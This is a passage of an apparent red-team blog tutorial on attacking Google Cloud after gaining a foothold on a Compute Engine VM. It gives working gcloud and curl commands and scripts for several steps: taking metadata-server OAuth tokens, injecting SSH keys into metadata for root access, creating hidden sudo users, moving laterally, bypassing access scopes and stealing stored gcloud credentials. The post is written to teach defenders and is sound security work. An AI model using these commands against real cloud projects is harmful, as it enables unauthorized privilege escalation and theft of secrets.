internal [Red Team](/handbook/security/threat-management/red-team/) that dedicates time looking at the services and business partners we use to deliver GitLab products and services. As a [Google Cloud customer,](/blog/moving-to-gcp/) we have an obvious interest in all the different ways that administrators can make devastating security related mistakes when configuring their environment. We also have a team goal of sharing our research and tooling when possible with the community. This blog post and our previous post, [Introducing Token Hunter, an open source tool for finding sensitive data in the vast, wide-open,](/blog/introducing-token-hunter/) are our attempts to share our knowledge with the broader security community - for our mutual benefit._\n\n_This post does not outline any new vulnerabilities in Google Cloud Platform but outlines ways that an attacker who has already gained an unprivileged foothold on a cloud instance may perform reconnaissance, privilege escalation and eventually complete compromise of an environment._\n\n## Introduction\n\nWe recently embarked on a journey to simulate malicious activity in Google Cloud Platform (GCP). The idea was to begin with the low-privilege compromise of a Linux virtual machine, and then attempt to escalate privileges and access sensitive data throughout the environment.\n\nThe problem? There just isn't a lot of information available about GCP written from an attacker's perspective. We set out to learn as much as we could about Google Cloud and how an attacker might work to abuse common design decisions. Now, we are sharing that information with you! I'll also be presenting this talk, [Plundering GCP – escalating privileges, moving laterally and stealing secrets in Google Cloud](https://www.bsidesmelbourne.com/2020-plundering-gcp.html), in March 2020 at BSides Melbourne.\n\nIn this tutorial, we will do a very deep-dive into manual post-exploitation tactics and techniques for GCP. 
The specific scenario we are addressing here is the compromise of a single Linux-based virtual machine running within the Compute Engine offering. The goal is to elevate local privileges to a root account, compromise other systems within the same Google Cloud [Project](https://cloud.google.com/storage/docs/projects), break out of that project into others, and even hop the fence over to G Suite if possible.\n\nWe'll also go into specific detail on how to interact with a slew of Google's cloud services to hunt for secrets and exfiltrate sensitive data.\n\nIf you're tasked with defending infrastructure in Google Cloud, this tutorial should give you a good idea of what an attacker may get up to and the types of activities you should be looking out for.\n\nThis blog also introduces several utilities targeting GCP environments:\n\n- [gcp_firewall_enum](https://gitlab.com/gitlab-com/gl-security/gl-redteam/gcp_firewall_enum): Generate targeted port scans for Compute Instances exposed to the internet.\n- [gcp_enum](https://gitlab.com/gitlab-com/gl-security/gl-redteam/gcp_enum): Most of the enumeration commands in this blog, consolidated to a single script.\n- [gcp_misc](https://gitlab.com/gitlab-com/gl-security/gl-redteam/gcp_misc): Various tools for attacking GCP environments.\n\n*No shell? No problem! Most of these techniques can used with SSRF as well. Check out the [Leveraging SSRF](#leveraging-ssrf) appendix for more info.*\n\n## Basic background info\n\nGCP is a big beast with a ton of moving parts. Here is a bit of background on items that are most relevant to the breach of a Compute Instance.\n\n### Tools\n\n#### gcloud\n\nIt is likely that the box you land on will have the [GCP SDK tools](https://cloud.google.com/sdk/docs/) installed and configured. 
A quick way to verify that things are set up is to run the following command:\n\n```\n$ gcloud config list\n```\n\nIf properly configured, you should get some output detailing the current service account and project in use.\n\nThe [gcloud command set](https://cloud.google.com/sdk/gcloud/reference/) is pretty extensive, supports tab completion, and has excellent online and built-in documentation. You can also install it locally on your own machine and use it with credential data that you obtain.\n\n#### Cloud APIs\n\nThe `gcloud` command is really just a way of automating [Google Cloud API](https://cloud.google.com/apis/docs/overview) calls. However, you can also perform them manually. Understanding the API endpoints and functionality can be very helpful when you're operating with a very specific set of permissions, and trying to work out exactly what you can do.\n\nYou can see what the raw HTTP API call for any individual `gcloud` command is simply by appending `--log-http` to the command.\n\n#### Metadata endpoint\n\nEvery Compute Instance has access to a dedicated [metadata server](https://cloud.google.com/compute/docs/storing-retrieving-metadata) via the IP address 169.254.169.254. You can identify it as a host file entry like the one below:\n\n```\n$ cat /etc/hosts\n[...]\n169.254.169.254 metadata.google.internal  # Added by Google\n```\n\nThis metadata server allows any processes running on the instance to query Google for information about the instance it runs on and the project it resides in. 
No authentication is required - default `curl` commands will suffice.\n\nFor example, the following command will return information specific to the Compute Instance it is run from.\n\n```\n$ curl \"http://metadata.google.internal/computeMetadata/v1/?recursive=true&alt=text\" \\\n    -H \"Metadata-Flavor: Google\"\n```\n\n### Security concepts\n\nWhat you can actually do from within a compromised instance is the resultant combination of service accounts, access scopes, and IAM permissions. These are described below.\n\n#### Resource hierarchy\n\nGoogle Cloud uses a [Resource hierarchy](https://cloud.google.com/resource-manager/docs/cloud-platform-resource-hierarchy) that is similar, conceptually, to that of a traditional filesystem. This provides a logical parent/child workflow with specfic attachment points for policies and permissions.\n\nAt a high level, it looks like this:\n\n```\nOrganization\n--> Folders\n  --> Projects\n    --> Resources\n```\n\nThe scenario this blog addresses is the compromise of a virtual machine (called a Compute Instance), which is a resource. This resource resides in a project, probably alongside other Compute Instances, storage buckets, etc.\n\nWe will work to compromise as much as we can inside that project, and then eventually to branch out into other projects within the same organization. A full compromise of the organization itself would be great, but gaining access to confidential assets may be possible simply by exploring the resources in a single project.\n\n#### Service accounts\n\nVirtual machine instances are usually assigned a service account. Every GCP project has a [default service account](https://cloud.google.com/compute/docs/access/service-accounts#default_service_account), and this will be assigned to new Compute Instances unless otherwise specified. Administrators can choose to use either a custom account or no account at all. 
This service account can be used by any user or application on the machine to communicate with the Google APIs. You can run the following command to see what accounts are available to you:\n\n```\n$ gcloud auth list\n```\n\nDefault service accounts will look like one of the following:\n\n```\nPROJECT_NUMBER-compute@developer.gserviceaccount.com\nPROJECT_ID@appspot.gserviceaccount.com\n```\n\nMore savvy administrators will have configured a custom service account to use with the instance. This allows them to be more granular with permissions.\n\nA custom service account will look like this:\n\n```\nSERVICE_ACCOUNT_NAME@PROJECT_NAME.iam.gserviceaccount.com\n```\n\nIf `gcloud auth list` returns multiple accounts available, something interesting is going on. You should generally see only the service account. If there is more than one, you can cycle through each using `gcloud config set account [ACCOUNT]` while trying the various tasks in this blog.\n\n#### Access scopes\n\nThe service account on a GCP Compute Instance will use OAuth to communicate with the Google Cloud APIs. When [access scopes](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam) are used, the OAuth token that is generated for the instance will have a [scope](https://oauth.net/2/scope/) limitation included. This defines what API endpoints it can authenticate to. It does NOT define the actual permissions.\n\nWhen using a custom service account, Google [recommends](https://cloud.google.com/compute/docs/access/service-accounts#service_account_permissions) that access scopes are not used and to rely totally on IAM. 
The web management portal actually enforces this, but access scopes can still be applied to instances using custom service accounts programatically.\n\nThere are three options when setting an access scope on a VM instance:\n- Allow default access\n- All full access to all cloud APIs\n- Set access for each API\n\nYou can see what scopes are assigned by querying the metadata URL. Here is an example from a VM with \"default\" access assigned:\n\n```\n$ curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes \\\n    -H 'Metadata-Flavor:Google'\n\nhttps://www.googleapis.com/auth/devstorage.read_only\nhttps://www.googleapis.com/auth/logging.write\nhttps://www.googleapis.com/auth/monitoring.write\nhttps://www.googleapis.com/auth/servicecontrol\nhttps://www.googleapis.com/auth/service.management.readonly\nhttps://www.googleapis.com/auth/trace.append\n```\n\nThe most interesting thing in the default scope is `devstorage.read_only`. This grants read access to all storage buckets in the project. This can be devastating, which of course is great for us as an attacker.\n\nHere is what you'll see from an instance with no scope limitations:\n\n```\n$ curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes -H 'Metadata-Flavor:Google'\nhttps://www.googleapis.com/auth/cloud-platform\n```\n\nThis `cloud-platform` scope is what we are really hoping for, as it will allow us to authenticate to any API function and leverage the full power of our assigned IAM permissions. It is also Google's recommendation as it forces administrators to choose only necessary permissions, and not to rely on access scopes as a barrier to an API endpoint.\n\nIt is possible to encounter some conflicts when using both IAM and access scopes. 
For example, your service account may have the IAM role of `compute.instanceAdmin` but the instance you've breached has been crippled with the scope limitation of `https://www.googleapis.com/auth/compute.readonly`. This would prevent you from making any changes using the OAuth token that's automatically assigned to your instance.\n\n#### Identity and access management (IAM)\n\nIAM permissions are used for fine-grained access control. There are [a lot](https://cloud.google.com/iam/docs/permissions-reference) of them. The permissions are bundled together using three types of [roles](https://cloud.google.com/iam/docs/understanding-roles):\n\n- Primitive roles: Owner, Editor, and Viewer. These are the old-school way of doing things. The default service account in every project is assigned the Editor role. This is insecure and we love it.\n- Predefined roles: These roles are managed by Google and are meant to be combinations of most-likely scenarios. One of our favorites is the `compute.instanceAdmin` role, as it allows for easy privilege escalation.\n- Custom roles: This allows admins to group their own set of granular permissions.\n\nAs of this writing, there are 2,574 fine-grained permissions in IAM. These individual permissions are bundled together into a role. A role is connected to a member (user or service account) in what Google calls a [binding](https://cloud.google.com/iam/docs/reference/rest/v1/Policy#binding). 
Finally, this binding is applied at some level of the GCP hierarchy via a [policy](https://cloud.google.com/iam/docs/reference/rest/v1/Policy).\n\nThis policy determines what actions are allowed - it is the intersection between accounts, permissions, resources, and (optionally) conditions.\n\nYou can try the following command to specifically enumerate roles assigned to your service account project-wide in the current project:\n\n```\n$ PROJECT=$(curl http://metadata.google.internal/computeMetadata/v1/project/project-id \\\n    -H \"Metadata-Flavor: Google\" -s)\n$ ACCOUNT=$(curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email \\\n    -H \"Metadata-Flavor: Google\" -s)\n$ gcloud projects get-iam-policy $PROJECT  \\\n    --flatten=\"bindings[].members\" \\\n    --format='table(bindings.role)' \\\n    --filter=\"bindings.members:$ACCOUNT\"\n```\n\nDon't worry too much if you get denied access to the command above. It's still possible to work out what you can do simply by trying to do it.\n\nMore generally, you can shorten the command to the following to get an idea of the roles assigned project-wide to all members.\n\n```\n$ gcloud projects get-iam-policy [PROJECT-ID]\n```\n\nOr to see the IAM policy [assigned to a single Compute Instance](https://cloud.google.com/sdk/gcloud/reference/compute/instances/get-iam-policy) you can try the following.\n\n```\n$ gcloud compute instances get-iam-policy [INSTANCE] --zone [ZONE]\n```\n\nThere are similar commands for various other APIs. 
Consult the documentation if you need one other than what is shown above.\n\n### Default credentials\n\n#### Default service account token\n\nThe metadata server available to a given instance will provide any user/process on that instance with an OAuth token that is automatically used as the default credentials when communicating with Google APIs via the `gcloud` command.\n\nYou can retrieve and inspect the token with the following curl command:\n\n```\n$ curl \"http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token\" \\\n    -H \"Metadata-Flavor: Google\"\n```\n\nWhich will receive a response like the following:\n\n```\n{\n      \"access_token\":\"ya29.AHES6ZRN3-HlhAPya30GnW_bHSb_QtAS08i85nHq39HE3C2LTrCARA\",\n      \"expires_in\":3599,\n      \"token_type\":\"Bearer\"\n }\n```\n\nThis token is the combination of the service account and access scopes assigned to the Compute Instance. So, even though your service account may have every IAM privilege imaginable, this particular OAuth token might be limited in the APIs it can communicate with due to access scopes.\n\n#### Application default credentials\n\nAs an alternative to first pulling a token from the metadata server, Google also has a strategy called [Application Default Credentials](https://cloud.google.com/docs/authentication/production). When using one of Google's official GCP client libraries, the code will automatically go searching for credentials to use in a defined order.\n\nThe very first location it would check would be the [source code itself](https://cloud.google.com/docs/authentication/production#passing_the_path_to_the_service_account_key_in_code). Developers can choose to statically point to a service account key file.\n\nThe next is an environment variable called `GOOGLE_APPLICATION_CREDENTIALS`. This can be set to point to a service account key file. 
Look for the variable itself set in the context of a system account or for references to setting it in scripts and instance metadata.\n\nFinally, if neither of these are provided, the application will revert to using the default token provided by the metadata server as described in the section above.\n\nFinding the actual JSON file with the service account credentials is generally much more desirable than relying on the OAuth token on the metadata server. This is because the raw service account credentials can be activated without the burden of access scopes and without the short expiration period usually applied to the tokens.\n\n## Local privilege escalation\n\nThis section will provide some tips on quick wins for local privilege escalation. If they work right away, great! While getting root locally seems like a logical starting point, though, hacking in the real world is rarely this organized. You may find that you need to jump ahead and grab additional secrets from a later step before you can escalate with these methods.\n\nDon't feel discouraged if you can't get local root right away - keep reading and follow the path that naturally unfolds.\n\n### Follow the scripts!\n\nCompute Instances are there to do things. To do things in Google, they will use their service accounts. And to do things with those service accounts, they likely use scripts!\n\nOften, we'll find ourselves on a Compute Instance and fail to enumerate things like available storage buckets, crypto keys, other instances, etc., due to permission denied errors. 
IAM permissions are very granular, meaning you can grant permissions to individual resources without granting the permission to list what those resources are.\n\nA great hypothetical example of this is a Compute Instance that has permission to read/write backups to a storage bucket called `instance82736-long-term-xyz-archive-0332893`.\n\nRunning `gsutil ls` from the command line returns nothing, as the service account is lacking the `storage.buckets.list` IAM permission. However, if you ran `gsutil ls gs://instance82736-long-term-xyz-archive-0332893` you may find a complete filesystem backup, giving you clear-text access to data that your local Linux account lacks.\n\nBut how would you know to list the contents of that very-specific bucket name? While brute-forcing buckets is a good idea, there is no way you'd find that in a word list.\n\nBut, the instance is somehow backing up to it. Probably using a script!\n\nLook for references to the `gcloud` command in scripts within the instance's metadata, local filesystem, service unit files, etc. You may also find Python, Ruby, PHP, etc scripts using their own [GCP client libraries](https://cloud.google.com/apis/docs/cloud-client-libraries) that leverage the service account's permissions to get things done.\n\nScripts in general help you understand what the machine is meant to do and will help you in identifying ways to abuse that intended functionality.\n\n### Modifying the metadata\n\nIf you can modify the instance's metadata, there are numerous ways to escalate privileges locally. 
There are a few scenarios that can lead to a service account with this permission:\n\n*Default service account*\u003Cbr>\nWhen using the default service account, the web management console offers the following options for access scopes:\n\n- Allow default access (default)\n- Allow full access to all Cloud APIs\n- Set access for each API\n\nIf option 2 was selected, or option 3 while explicitly allowing access to the compute API, then this configuration is vulnerable to escalation.\n\n*Custom service account*\u003Cbr>\nWhen using a custom service account, one of the following IAM permissions is necessary to escalate privileges:\n\n- compute.instances.setMetadata (to affect a single instance)\n- compute.projects.setCommonInstanceMetadata (to affect all instances in the project)\n\nAlthough Google [recommends](https://cloud.google.com/compute/docs/access/service-accounts#associating_a_service_account_to_an_instance) not using access scopes for custom service accounts, it is still possible to do so. You'll need one of the following access scopes:\n\n- https://www.googleapis.com/auth/compute\n- https://www.googleapis.com/auth/cloud-platform\n\n#### Add SSH keys to custom metadata\n\nLinux systems on GCP will typically be running [Python Linux Guest Environment for Google Compute Engine](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts) scripts. One of these is the [accounts daemon](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts), which periodically queries the instance metadata endpoint for changes to the authorized SSH public keys.\n\nIf a new public key is encountered, it will be processed and added to the local machine. 
Depending on the format of the key, it will either be added to the `~/.ssh/authorized_keys` file of an existing user or will create a new user with `sudo` rights.\n\nSo, if you can modify custom instance metadata with your service account, you can escalate to root on the local system by gaining SSH rights to a privileged account. If you can modify custom project metadata, you can escalate to root on any system in the current GCP project that is running the accounts daemon.\n\n##### Add SSH key to existing privileged user\n\nLet's start by adding our own key to an existing account, as that will probably make the least noise. You'll want to be careful not to wipe out any keys that already exist in metadata, as that may tip your target off.\n\nCheck the instance for existing SSH keys. Pick one of these users as they are likely to have sudo rights.\n\n```\n$ gcloud compute instances describe [INSTANCE] --zone [ZONE]\n```\n\nLook for a section like the following:\n\n```\n ...\n metadata:\n   fingerprint: QCZfVTIlKgs=\n   items:\n   ...\n   - key: ssh-keys\n     value: |-\n       alice:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC/SQup1eHdeP1qWQedaL64vc7j7hUUtMMvNALmiPfdVTAOIStPmBKx1eN5ozSySm5wFFsMNGXPp2ddlFQB5pYKYQHPwqRJp1CTPpwti+uPA6ZHcz3gJmyGsYNloT61DNdAuZybkpPlpHH0iMaurjhPk0wMQAMJUbWxhZ6TTTrxyDmS5BnO4AgrL2aK+peoZIwq5PLMmikRUyJSv0/cTX93PlQ4H+MtDHIvl9X2Al9JDXQ/Qhm+faui0AnS8usl2VcwLOw7aQRRUgyqbthg+jFAcjOtiuhaHJO9G1Jw8Cp0iy/NE8wT0/tj9smE1oTPhdI+TXMJdcwysgavMCE8FGzZ alice\n       bob:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC2fNZlw22d3mIAcfRV24bmIrOUn8l9qgOGj1LQgOTBPLAVMDAbjrM/98SIa1NainYfPSK4oh/06s7xi5B8IzECrwqfwqX0Z3VbW9oQbnlaBz6AYwgGHE3Fdrbkg/Ew8SZAvvvZ3bCwv0i5s+vWM3ox5SIs7/W4vRQBUB4DIDPtj0nK1d1ibxCa59YA8GdpIf797M0CKQ85DIjOnOrlvJH/qUnZ9fbhaHzlo2aSVyE6/wRMgToZedmc6RzQG2byVxoyyLPovt1rAZOTTONg2f3vu62xVa/PIk4cEtCN3dTNYYf3NxMPRF6HCbknaM9ixmu3ImQ7+vG3M+g9fALhBmmF bob\n ...\n```\n\nNotice the slightly odd format of the public keys - the username is listed at the beginning (followed by 
a colon) and then again at the end. We'll need to match this format. Unlike normal SSH key operation, the username absolutely matters!\n\nSave the lines with usernames and keys in a new text file called `meta.txt`.\n\nLet's assume we are targeting the user `alice` from above. We'll generate a new key for ourselves like this:\n\n```\n$ ssh-keygen -t rsa -C \"alice\" -f ./key -P \"\" && cat ./key.pub\n```\n\nTake the output of the command above and use it to add a line to the `meta.txt` file you created above, ensuring to add `alice:` to the beginning of your new public key.\n\n`meta.txt` should now look something like this, including the existing keys and the new key you just generated:\n\n```\nalice:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC/SQup1eHdeP1qWQedaL64vc7j7hUUtMMvNALmiPfdVTAOIStPmBKx1eN5ozSySm5wFFsMNGXPp2ddlFQB5pYKYQHPwqRJp1CTPpwti+uPA6ZHcz3gJmyGsYNloT61DNdAuZybkpPlpHH0iMaurjhPk0wMQAMJUbWxhZ6TTTrxyDmS5BnO4AgrL2aK+peoZIwq5PLMmikRUyJSv0/cTX93PlQ4H+MtDHIvl9X2Al9JDXQ/Qhm+faui0AnS8usl2VcwLOw7aQRRUgyqbthg+jFAcjOtiuhaHJO9G1Jw8Cp0iy/NE8wT0/tj9smE1oTPhdI+TXMJdcwysgavMCE8FGzZ alice\nbob:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC2fNZlw22d3mIAcfRV24bmIrOUn8l9qgOGj1LQgOTBPLAVMDAbjrM/98SIa1NainYfPSK4oh/06s7xi5B8IzECrwqfwqX0Z3VbW9oQbnlaBz6AYwgGHE3Fdrbkg/Ew8SZAvvvZ3bCwv0i5s+vWM3ox5SIs7/W4vRQBUB4DIDPtj0nK1d1ibxCa59YA8GdpIf797M0CKQ85DIjOnOrlvJH/qUnZ9fbhaHzlo2aSVyE6/wRMgToZedmc6RzQG2byVxoyyLPovt1rAZOTTONg2f3vu62xVa/PIk4cEtCN3dTNYYf3NxMPRF6HCbknaM9ixmu3ImQ7+vG3M+g9fALhBmmF bob\nalice:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDnthNXHxi31LX8PlsGdIF/wlWmI0fPzuMrv7Z6rqNNgDYOuOFTpM1Sx/vfvezJNY+bonAPhJGTRCwAwytXIcW6JoeX5NEJsvEVSAwB1scOSCEAMefl0FyIZ3ZtlcsQ++LpNszzErreckik3aR+7LsA2TCVBjdlPuxh4mvWBhsJAjYS7ojrEAtQsJ0mBSd20yHxZNuh7qqG0JTzJac7n8S5eDacFGWCxQwPnuINeGoacTQ+MWHlbsYbhxnumWRvRiEm7+WOg2vPgwVpMp4sgz0q5r7n/l7YClvh/qfVquQ6bFdpkVaZmkXoaO74Op2Sd7C+MBDITDNZPpXIlZOf4OLb alice\n```\n\nNow, you can re-write the SSH key metadata for your instance with the following command:\n\n```\n$ gcloud 
compute instances add-metadata [INSTANCE] --metadata-from-file ssh-keys=meta.txt\n```\n\nYou can now access a shell in the context of `alice` as follows:\n\n```\nlowpriv@instance:~$ ssh -i ./key alice@localhost\nalice@instance:~$ sudo id\nuid=0(root) gid=0(root) groups=0(root)\n```\n\n##### Create a new privileged user\n\nNo existing keys found when following the steps above? No one else interesting in `/etc/passwd` to target?\n\nYou can follow the same process as above, but just make up a new username. This user will be created automatically and given rights to `sudo`. Scripted, the process would look like this:\n\n```\n# define the new account username\nNEWUSER=\"definitelynotahacker\"\n\n# create a key\nssh-keygen -t rsa -C \"$NEWUSER\" -f ./key -P \"\"\n\n# create the input meta file\nNEWKEY=\"$(cat ./key.pub)\"\necho \"$NEWUSER:$NEWKEY\" > ./meta.txt\n\n# update the instance metadata\ngcloud compute instances add-metadata [INSTANCE_NAME] --metadata-from-file ssh-keys=meta.txt\n\n# ssh to the new account\nssh -i ./key \"$NEWUSER\"@localhost\n```\n##### Grant sudo to existing session\nThis one is so easy, quick, and dirty that it feels wrong...\n\n```\n$ gcloud compute ssh [INSTANCE NAME]\n```\n\nThis will generate a new SSH key, add it to your existing user, and add your existing username to the `google-sudoers` group, and start a new SSH session. While it is quick and easy, it may end up making more changes to the target system than the previous methods.\n\nWe'll talk about this again for lateral movement, but it works perfectly fine for local privilege escalation as well.\n\n##### Using OS Login\n\n[OS Login](https://cloud.google.com/compute/docs/oslogin/) is an alternative to managing SSH keys. 
It links a Google user or service account to a Linux identity, relying on IAM permissions to grant or deny access to Compute Instances.\n\nOS Login is [enabled](https://cloud.google.com/compute/docs/instances/managing-instance-access#enable_oslogin) at the project or instance level using the metadata key of `enable-oslogin = TRUE`.\n\nOS Login with two-factor authentication is [enabled](https://cloud.google.com/compute/docs/oslogin/setup-two-factor-authentication) in the same manner with the metadata key of `enable-oslogin-2fa = TRUE`.\n\nThe following two IAM permissions control SSH access to instances with OS Login enabled. They can be applied at the project or instance level:\n\n- roles/compute.osLogin (no sudo)\n- roles/compute.osAdminLogin (has sudo)\n\nUnlike managing only with SSH keys, these permissions allow the administrator to control whether or not `sudo` is granted.\n\nIf you're lucky, your service account has these permissions. You can simply run the `gcloud compute ssh [INSTANCE]` command to [connect manually as the service account](https://cloud.google.com/compute/docs/instances/connecting-advanced#sa_ssh_manual). Two-factor is only enforced when using user accounts, so that should not slow you down even if it is assigned as shown above.\n\nSimilar to using SSH keys from metadata, you can use this strategy to escalate privileges locally and/or to access other Compute Instances on the network.\n\n## Lateral movement\n\nYou've compromised one VM inside a project. Great! Now let's get some more...\n\nYou can try the following command to get a list of all instances in your current project:\n\n```\n$ gcloud compute instances list\n```\n\n### SSH'ing around\n\nYou can use the local privilege escalation tactics above to move around to other machines. 
Read through those sections for a detailed description of each method and the associated commands.\n\nWe can expand upon those a bit by [applying SSH keys at the project level](https://cloud.google.com/compute/docs/instances/adding-removing-ssh-keys#project-wide), granting you permission to SSH into a privileged account for any instance that has not explicitly chosen the \"Block project-wide SSH keys\" option.\n\nAfter you've identified the strategy for selecting or creating a new user account, you can use the following syntax.\n\n```\n$ gcloud compute project-info add-metadata --metadata-from-file ssh-keys=meta.txt\n```\n\nIf you're really bold, you can also just type `gcloud compute ssh [INSTANCE]` to use your current username on other boxes.\n\n### Abusing networked services\n\n#### Some GCP networking tidbits\n\nCompute Instances are connected to networks called VPCs or [Virtual Private Clouds](https://cloud.google.com/vpc/docs/vpc). [GCP firewall](https://cloud.google.com/vpc/docs/firewalls) rules are defined at this network level but are applied individually to a Compute Instance. Every network, by default, has two [implied firewall rules](https://cloud.google.com/vpc/docs/firewalls#default_firewall_rules): allow outbound and deny inbound.\n\nEach GCP project is provided with a VPC called `default`, which applies the following rules to all instances:\n\n- default-allow-internal (allow all traffic from other instances on the `default` network)\n- default-allow-ssh (allow 22 from everywhere)\n- default-allow-rdp (allow 3389 from everywhere)\n- default-allow-icmp (allow ping from everywhere)\n\n#### Meet the neighbors\n\nFirewall rules may be more permissive for internal IP addresses. 
This is especially true for the default VPC, which permits all traffic between Compute Instances.\n\nYou can get a nice readable view of all the subnets in the current project with the following command:\n\n```\n$ gcloud compute networks subnets list\n```\n\nAnd an overview of all the internal/external IP addresses of the Compute Instances using the following:\n\n```\n$ gcloud compute instances list\n```\n\nIf you go crazy with nmap from a Compute Instance, Google will notice and will likely send an alert email to the project owner. This is more likely to happen if you are scanning public IP addresses outside of your current project. Tread carefully.\n\n#### Enumerating public ports\n\nPerhaps you've been unable to leverage your current access to move through the project internally, but you DO have read access to the compute API. It's worth enumerating all the instances with firewall ports open to the world - you might find an insecure application to breach and hope you land in a more powerful position.\n\nIn the section above, you've gathered a list of all the public IP addresses. You could run nmap against them all, but this may take ages and could get your source IP blocked.\n\nWhen attacking from the internet, the default rules don't provide any quick wins on properly configured machines. It's worth checking for password authentication on SSH and weak passwords on RDP, of course, but that's a given.\n\nWhat we are really interested in is other firewall rules that have been intentionally applied to an instance. 
If we're lucky, we'll stumble over an insecure application, an admin interface with a default password, or anything else we can exploit.\n\n[Firewall rules](https://cloud.google.com/vpc/docs/firewalls) can be applied to instances via the following methods:\n\n- [Network tags](https://cloud.google.com/vpc/docs/add-remove-network-tags)\n- [Service accounts](https://cloud.google.com/vpc/docs/firewalls#serviceaccounts)\n- All instances within a VPC\n\nUnfortunately, there isn't a simple `gcloud` command to spit out all Compute Instances with open ports on the internet. You have to connect the dots between firewall rules, network tags, service accounts, and instances.\n\nWe've automated this completely using [this python script](https://gitlab.com/gitlab-com/gl-security/gl-redteam/gcp_firewall_enum) which will export the following:\n\n- CSV file showing instance, public IP, allowed TCP, allowed UDP\n- nmap scan to target all instances on ports ingress allowed from the public internet (0.0.0.0/0)\n- masscan to target the full TCP range of those instances that allow ALL TCP ports from the public internet (0.0.0.0/0)\n\nFull documentation on that tool is available in the [README](https://gitlab.com/gitlab-com/gl-security/gl-redteam/gcp_firewall_enum/blob/master/README.md).\n\n## Cloud privilege escalation\n\nIn this section, we'll talk about ways to potentially increase our privileges within the cloud environment itself.\n\n### Organization-level IAM permissions\n\nMost of the commands in this blog focus on obtaining project-level data. However, it's important to know that permissions can be set at the highest level of \"Organization\" as well. 
If you can enumerate this info, this will give you an idea of which accounts may have access across all of the projects inside an org.\n\nThe following commands will list the policies set at this level:\n\n```\n# First, get the numeric organization ID\n$ gcloud organizations list\n\n# Then, enumerate the policies\n$ gcloud organizations get-iam-policy [ORG ID]\n```\n\nPermissions you see in this output will be applied to EVERY project. If you don't have access to any of the accounts listed, continue reading to the [Service Account Impersonation](#service-account-impersonation) section below.\n\n### Bypassing access scopes\n\nThere's nothing worse than having access to a powerful service account but being limited by the access scopes of your current OAuth token. But fret not! Just the existence of that powerful account introduces risks which we might still be able to abuse.\n\n#### Pop another box\n\nIt's possible that another box in the environment exists with less restrictive access scopes. If you can view the output of `gcloud compute instances list --quiet --format=json`, look for instances with either the specific scope you want or the `auth/cloud-platform` all-inclusive scope.\n\nAlso keep an eye out for instances that have the default service account assigned (`PROJECT_NUMBER-compute@developer.gserviceaccount.com`).\n\n#### Find service account keys\n\nGoogle states very clearly [**\"Access scopes are not a security mechanism... they have no effect when making requests not authenticated through OAuth\"**](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam).\n\nSo, if we have a powerful service account but a limited OAuth token, we need to somehow authenticate to services without OAuth.\n\nThe easiest way to do this would be to stumble across a [service account key](https://cloud.google.com/iam/docs/creating-managing-service-account-keys) stored on the instance. 
These are RSA private keys that can be used to authenticate to the Google Cloud API and request a new OAuth token with no scope limitations.\n\nYou can tell which service accounts, if any, have had key files exported for them. This will let you know whether or not it's even worth hunting for them, and possibly give you some hints on where to look. The command below will help.\n\n```\n$ for i in $(gcloud iam service-accounts list --format=\"table[no-heading](email)\"); do\n    echo Looking for keys for $i:\n    gcloud iam service-accounts keys list --iam-account $i\ndone\n```\n\nThese files are not stored on a Compute Instance by default, so you'd have to be lucky to encounter them. When a service account key file is exported from the GCP console, the default name for the file is [project-id]-[portion-of-key-id].json. So, if your project name is `test-project` then you can search the filesystem for `test-project*.json` looking for this key file.\n\nThe contents of the file look something like this:\n\n```\n{\n\"type\": \"service_account\",\n\"project_id\": \"[PROJECT-ID]\",\n\"private_key_id\": \"[KEY-ID]\",\n\"private_key\": \"-----BEGIN PRIVATE KEY-----\\n[PRIVATE-KEY]\\n-----END PRIVATE KEY-----\\n\",\n\"client_email\": \"[SERVICE-ACCOUNT-EMAIL]\",\n\"client_id\": \"[CLIENT-ID]\",\n\"auth_uri\": \"https://accounts.google.com/o/oauth2/auth\",\n\"token_uri\": \"https://accounts.google.com/o/oauth2/token\",\n\"auth_provider_x509_cert_url\": \"https://www.googleapis.com/oauth2/v1/certs\",\n\"client_x509_cert_url\": \"https://www.googleapis.com/robot/v1/metadata/x509/[SERVICE-ACCOUNT-EMAIL]\"\n}\n\n```\n\nOr, if generated from the CLI they will look like this:\n\n```\n{\n\"name\": \"projects/[PROJECT-ID]/serviceAccounts/[SERVICE-ACCOUNT-EMAIL]/keys/[KEY-ID]\",\n\"privateKeyType\": \"TYPE_GOOGLE_CREDENTIALS_FILE\",\n\"privateKeyData\": \"[PRIVATE-KEY]\",\n\"validAfterTime\": \"[DATE]\",\n\"validBeforeTime\": \"[DATE]\",\n\"keyAlgorithm\": 
\"KEY_ALG_RSA_2048\"\n}\n```\n\nIf you do find one of these files, you can tell the `gcloud` command to re-authenticate with this service account. You can do this on the instance, or on any machine that has the tools installed.\n\n```\n$ gcloud auth activate-service-account --key-file [FILE]\n```\n\nYou can now test your new OAuth token as follows:\n\n```\n$ TOKEN=`gcloud auth print-access-token`\n$ curl https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=$TOKEN\n```\n\nYou should see `https://www.googleapis.com/auth/cloud-platform` listed in the scopes, which means you are not limited by any instance-level access scopes. You now have full power to use all of your assigned IAM permissions.\n\n#### Steal gcloud authorizations\n\nIt's quite possible that other users on the same box have been running `gcloud` commands using an account more powerful than your own. You'll need local root to do this.\n\nFirst, find what `gcloud` config directories exist in users' home folders.\n\n```\n$ sudo find / -name \"gcloud\"\n```\n\nYou can manually inspect the files inside, but these are generally the ones with the secrets:\n\n- ~/.config/gcloud/credentials.db\n- ~/.config/gcloud/legacy_credentials/[ACCOUNT]/adc.json\n- ~/.config/gcloud/legacy_credentials/[ACCOUNT]/.boto\n- ~/.credentials.json\n\nNow, you have the option of looking for clear text credentials in these files or simply copying the entire `gcloud` folder to a machine you control and running `gcloud auth list` to see what accounts are now available to you.\n\n### Service account 